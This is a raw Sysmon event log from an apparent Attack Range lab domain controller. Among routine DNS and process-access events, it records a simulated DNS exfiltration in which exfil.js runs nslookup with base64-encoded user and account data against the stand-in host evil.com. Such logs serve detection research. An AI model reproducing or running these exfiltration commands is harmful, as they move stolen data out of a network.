process>-udptruefalse127.0.0.1-50643-false127.0.0.1-53domain 354300x8000000000000000208771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.252{00000000-0000-0000-0000-000000000000}4596<unknown process>-udpfalsefalse127.0.0.1-50642-false127.0.0.1-53domain 354300x8000000000000000208770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.252{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50642- 354300x8000000000000000208769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.252{00000000-0000-0000-0000-000000000000}4596<unknown process>-udptruefalse127.0.0.1-50642-false127.0.0.1-53domain 354300x8000000000000000208768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.178{00000000-0000-0000-0000-000000000000}2792<unknown process>-udpfalsefalse127.0.0.1-50641-false127.0.0.1-53domain 354300x8000000000000000208767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.178{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50641- 354300x8000000000000000208766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.178{00000000-0000-0000-0000-000000000000}2792<unknown process>-udptruefalse127.0.0.1-50641-false127.0.0.1-53domain 354300x8000000000000000208765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.178{00000000-0000-0000-0000-000000000000}2792<unknown process>-udpfalsefalse127.0.0.1-50640-false127.0.0.1-53domain 354300x8000000000000000208764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.178{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50640- 354300x8000000000000000208763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.178{00000000-0000-0000-0000-000000000000}2792<unknown process>-udptruefalse127.0.0.1-50640-false127.0.0.1-53domain 354300x8000000000000000208762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.178{00000000-0000-0000-0000-000000000000}2792<unknown process>-udpfalsefalse127.0.0.1-50639-false127.0.0.1-53domain 10341000x8000000000000000208761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.196{2E1864BB-18EB-629A-8E43-000000005F02}76927620C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-8F43-000000005F02}1488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.196{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.196{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.196{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.196{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.196{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-8F43-000000005F02}1488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.196{2E1864BB-18EB-629A-8D43-000000005F02}64887392C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-8F43-000000005F02}1488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.196{2E1864BB-18EB-629A-8F43-000000005F02}1488C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EB-629A-8D43-000000005F02}6488C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltqrxrv.tmp 2>&1 10341000x8000000000000000208753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.175{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-8E43-000000005F02}7692C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.175{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-8E43-000000005F02}7692C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.158{2E1864BB-18EB-629A-8E43-000000005F02}76927620C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-8D43-000000005F02}6488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.143{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-8E43-000000005F02}7692C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.143{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.143{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.143{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.143{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.143{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-8D43-000000005F02}6488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.143{2E1864BB-18E0-629A-6742-000000005F02}39762444C:\Windows\System32\WScript.exe{2E1864BB-18EB-629A-8D43-000000005F02}6488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.145{2E1864BB-18EB-629A-8D43-000000005F02}6488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltqrxrv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.127{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkese.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.112{2E1864BB-18EB-629A-8B43-000000005F02}46727296C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-8C43-000000005F02}6512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.112{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-8C43-000000005F02}6512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.096{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.096{2E1864BB-18EB-629A-8A43-000000005F02}12761804C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-8C43-000000005F02}6512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.110{2E1864BB-18EB-629A-8C43-000000005F02}6512C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EB-629A-8A43-000000005F02}1276C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkese.tmp 2>&1 10341000x8000000000000000208733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 